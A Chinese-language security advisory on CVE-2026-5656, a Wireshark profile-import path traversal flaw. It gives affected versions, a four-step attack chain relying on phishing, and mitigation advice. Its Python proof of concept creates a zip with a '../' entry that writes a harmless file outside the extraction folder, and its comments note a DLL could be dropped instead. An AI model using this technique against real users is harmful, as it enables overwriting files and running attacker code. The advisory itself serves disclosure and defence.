CVE-2026-5656 Wireshark路径遍历漏洞

漏洞信息

漏洞编号

CVE-2026-5656

漏洞类型

路径遍历

CVSS评分

7.0 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Wireshark

漏洞概述

Wireshark是一款全球流行的网络协议分析工具，广泛应用于网络故障排查和安全分析。在Wireshark 4.6.0至4.6.4版本及4.4.0至4.4.14版本中，发现了一个严重的配置文件导入路径遍历漏洞。该漏洞源于程序在处理配置文件导入时未正确验证路径，攻击者可诱导用户加载恶意文件利用此漏洞。成功利用可能导致应用程序崩溃（拒绝服务），在特定环境下甚至可能实现任意代码执行。

技术细节

该漏洞的根源在于Wireshark处理个人配置文件导入时的路径验证逻辑存在缺陷。具体而言，当用户导入一个经过特殊构造的配置文件（例如包含恶意路径的Zip压缩包）时，应用程序在解压或读取文件过程中，未对文件名中的路径遍历字符（如“../”）进行有效的过滤或标准化处理。这使得攻击者能够将文件解压到预期的配置目录之外，甚至覆盖Wireshark安装目录下的关键系统文件（如DLL文件或插件）。根据CVSS向量分析，该攻击需要本地访问权限且需要用户交互（UI:R），意味着攻击者常利用社会工程学手段，诱导受害者主动导入恶意文件。一旦关键文件被替换，当下次Wireshark启动或加载特定模块时，系统将加载并执行攻击者植入的恶意代码，从而导致拒绝服务或获取系统控制权限。

攻击链分析

STEP 1

1. 武器化

攻击者创建一个特制的Wireshark配置文件（如zip格式），其中包含带有“../”路径遍历序列的文件名，旨在将文件写入到受限制目录之外。

STEP 2

2. 投递

通过钓鱼邮件、恶意网站或社会工程学手段，将包含恶意配置文件的压缩包发送给目标用户。

STEP 3

3. 利用

诱导目标用户在Wireshark中导入该恶意配置文件。由于漏洞存在，Wireshark解压文件时未校验路径，将恶意文件写入系统敏感目录（如覆盖DLL）。

STEP 4

4. 执行

当Wireshark重启或调用相关模块时，加载被篡改的文件，导致拒绝服务（崩溃）或执行攻击者控制的恶意代码。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import zipfile
import os

# Demonstrating the Path Traversal vulnerability in Wireshark Profile Import
# This script generates a malicious zip file containing a path traversal payload.

def create_malicious_profile():
    zip_name = "malicious_wireshark_profile.zip"
    
    # The payload content to be written outside the intended directory
    # In a real attack, this might be a malicious DLL or configuration script
    payload_data = b"This file should not be here due to path traversal."
    
    try:
        with zipfile.ZipFile(zip_name, 'w') as zf:
            # Use "../" sequences to escape the extraction folder
            # Attempting to write to a sensitive location (e.g., parent dir)
            malicious_filename = "../../../../../../tmp/pwned_wireshark.txt"
            
            # Create ZipInfo object to set metadata
            zinfo = zipfile.ZipInfo(filename=malicious_filename)
            zinfo.compress_type = zipfile.ZIP_DEFLATED
            
            # Write the payload
            zf.writestr(zinfo, payload_data)
            
        print(f"[+] Successfully created malicious profile: {zip_name}")
        print(f"[+] Payload contains path traversal: {malicious_filename}")
        print("[+] Import this file into vulnerable Wireshark to trigger the issue.")
        
    except Exception as e:
        print(f"[-] Error creating file: {e}")

if __name__ == "__main__":
    create_malicious_profile()

影响范围

Wireshark 4.4.0 - 4.4.14

Wireshark 4.6.0 - 4.6.4

防御指南

临时缓解措施

建议用户立即升级Wireshark到修复了此漏洞的版本。在无法立即升级的情况下，应严格限制从不可信来源导入配置文件的操作，并仅以普通用户权限运行Wireshark，以减少潜在代码执行带来的影响。